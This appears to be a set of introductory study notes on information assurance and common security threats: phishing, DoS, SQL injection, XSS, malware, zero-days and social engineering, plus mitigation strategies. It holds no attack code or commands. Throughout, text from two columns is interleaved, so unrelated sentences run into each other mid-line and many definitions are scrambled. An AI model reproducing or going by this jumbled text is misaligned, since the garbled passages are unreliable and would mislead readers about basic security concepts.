Information Assurance (IA) - Phishing - Phishing attacks

practice of assuring and managing involve tricking individuals into

the risks related to confidential providing sensitive information,
information, throughout the such as usernames, passwords, or
process of transmission, financial details, by posing
processing, and storing data.
as a trustworthy entity through
Mostly focused on the protection of emails, messages, or fake
the: websites.

Confidentiality – preventing Denial of Service (DoS) and

unauthorized access to Distributed Denial of Service
information. (DDoS) Attacks - These attacks
aim to overwhelm a system,
Integrity – ensuring information is
network, or service, making it
accurate and unchanged.
unavailable to legitimate users.
Availability – making sure Attackers flood the target with
information is accessible when traffic, rendering it inaccessible.
needed.
Insider Threats - Employees,
Authentication – verifying the contractors, or other individuals
identity of users or systems. with access to an organization's
systems can pose a threat by
Non-repudiation – ensuring
intentionally or unintentionally
actions can be traced and not
causing harm. This may involve
denied.
unauthorized access, data theft, or
Information Security (IS) - is other malicious actions.
basically the practice of
SQL Injection - In SQL injection
preventing: unauthorized access,
attacks, malicious code is inserted
use, disclosure, disruption,
into input fields, exploiting
modification, inspection, recording,
vulnerabilities in database systems
or destruction of information
to manipulate or retrieve sensitive
Security Threats in Information data.
Systems
Cross-Site Scripting (XSS) - XSS
Malware - Malicious software, attacks involve injecting malicious
such as viruses, worms, trojans, scripts into web pages that are
ransomware, and spyware, can viewed by other users. These
infect systems and compromise scripts can steal information,
their functionality, steal sensitive modify content, or perform other
information, or demand ransom. malicious actions.
Zero-Day Exploits - Attackers •Identifying vulnerabilities and
exploit vulnerabilities in software or potential impacts.
hardware that are not yet known to
• Conducting regular risk
the vendor or the public. This gives
assessments and security audits.
them a window of opportunity to
launch attacks before patches or Security Policies and
updates are available. Procedures

• Establishing comprehensive
security policies and guidelines.

• Employee awareness programs

Social Engineering - This
and training sessions.
involves manipulating individuals
into divulging confidential •Incident response plans and
information or performing actions disaster recovery strategies.
that may compromise security.
Network Security
Techniques include pretexting,
baiting, and quid pro quo. • Firewalls, intrusion detection and
prevention systems (IDS/IPS).
Data Breaches - Unauthorized
access to sensitive data, either • Virtual private networks (VPNs)
through hacking, insider threats, or for secure remote access.
other means, can lead to the
•Network segmentation and
exposure of personal or corporate
segregation.
information.
Data Encryption and Backup
Weak Authentication and
Authorization Inadequate • Encryption methods: symmetric
authentication and authorization and asymmetric encryption.
mechanisms can allow
• Secure storage and transmission
unauthorized users to gain access
of sensitive data.
to systems or sensitive information.
• Regular backups and offsite
Physical Threats - Physical
storage.
damage to hardware, such as theft,
vandalism, or natural disasters, can Patch Management and System
compromise the integrity and Updates
availability of information systems.
•Importance of timely software
Strategies for Mitigating updates and patches.
Security Threats
• Automated patch management
Risk Assessment tools and procedures.